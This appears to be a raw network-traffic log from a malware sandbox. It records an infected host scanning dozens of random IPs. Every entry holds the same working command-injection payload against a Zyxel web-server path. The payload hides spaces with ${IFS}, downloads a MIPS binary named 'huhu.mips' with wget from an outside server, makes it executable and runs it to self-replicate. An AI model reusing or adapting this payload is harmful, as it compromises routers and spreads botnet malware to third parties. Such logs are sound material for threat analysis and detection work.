                                      Jan 19, 2024 17:29:17.465079069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      723192.168.2.1444100122.118.197.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465117931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      724192.168.2.145869027.48.185.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465162039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      725192.168.2.1446202194.202.20.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465198994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      726192.168.2.145635836.11.211.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465236902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      727192.168.2.1439460164.222.164.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465270042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      728192.168.2.1455684145.6.189.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465322971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      729192.168.2.145348236.55.71.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465333939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      730192.168.2.143541294.184.115.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465385914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      731192.168.2.1448182220.85.223.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465454102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      732192.168.2.144082850.96.187.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465487003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      733192.168.2.146016874.219.170.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465528011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      734192.168.2.145928043.66.237.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465555906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      735192.168.2.1441772195.84.147.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465594053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      736192.168.2.1453512156.18.227.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465620995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      737192.168.2.1451638198.187.173.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465687990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      738192.168.2.1451196185.41.208.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465702057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      739192.168.2.1448524116.76.14.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465744019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      740192.168.2.1435884112.15.39.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465769053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      741192.168.2.144817867.239.47.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465822935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      742192.168.2.143338617.109.211.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465841055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      743192.168.2.143614814.36.240.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465883970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      744192.168.2.1450320106.52.253.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465917110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      745192.168.2.1444980202.116.38.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465969086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      746192.168.2.143754647.5.166.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466010094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      747192.168.2.144581679.86.223.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466047049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      748192.168.2.145155666.187.153.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466094017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      749192.168.2.1454846158.91.97.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466118097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      750192.168.2.1451830176.91.111.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466154099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      751192.168.2.143516680.37.148.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466178894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      752192.168.2.1460924156.111.147.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466212034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      753192.168.2.1456976207.72.108.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466254950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      754192.168.2.1454072133.30.152.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466303110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      755192.168.2.1436288103.230.227.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466331005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      756192.168.2.144246086.141.72.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466372967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      757192.168.2.1454992150.189.166.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466413975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      758192.168.2.1453262209.61.237.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466454983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      759192.168.2.1433650201.191.220.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466480017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      760192.168.2.14524601.54.77.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466531038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      761192.168.2.145857413.47.229.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466577053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      762192.168.2.144088077.53.91.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466600895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      763192.168.2.145364694.91.98.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466661930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      764192.168.2.1437928116.176.7.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466675997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      765192.168.2.1441952152.49.242.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466725111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      766192.168.2.1457748148.128.52.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466746092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      767192.168.2.145432264.53.217.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466789961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      768192.168.2.1444348205.225.55.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466830015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      769192.168.2.143671252.44.230.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466865063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      770192.168.2.1448198164.176.181.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466905117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      771192.168.2.1452818109.239.109.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466931105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      772192.168.2.143358696.112.45.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466969967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      773192.168.2.1439804128.36.201.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.466989994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      774192.168.2.1458024186.5.48.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467036009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      775192.168.2.1456514185.240.13.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467077017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      776192.168.2.1438880210.109.30.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467118025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      777192.168.2.144260494.247.151.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467144966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      778192.168.2.145664431.184.98.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467195034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      779192.168.2.1458292140.149.1.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467219114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      780192.168.2.145882644.144.84.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467263937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      781192.168.2.1457810101.223.120.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467312098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      782192.168.2.1453964101.174.136.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467340946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      783192.168.2.1458990211.234.219.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467375040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      784192.168.2.1442076220.131.62.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467422962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      785192.168.2.1434036197.2.159.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467454910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      786192.168.2.145699674.1.64.88443
                                      TimestampBytes transferredDirectionData
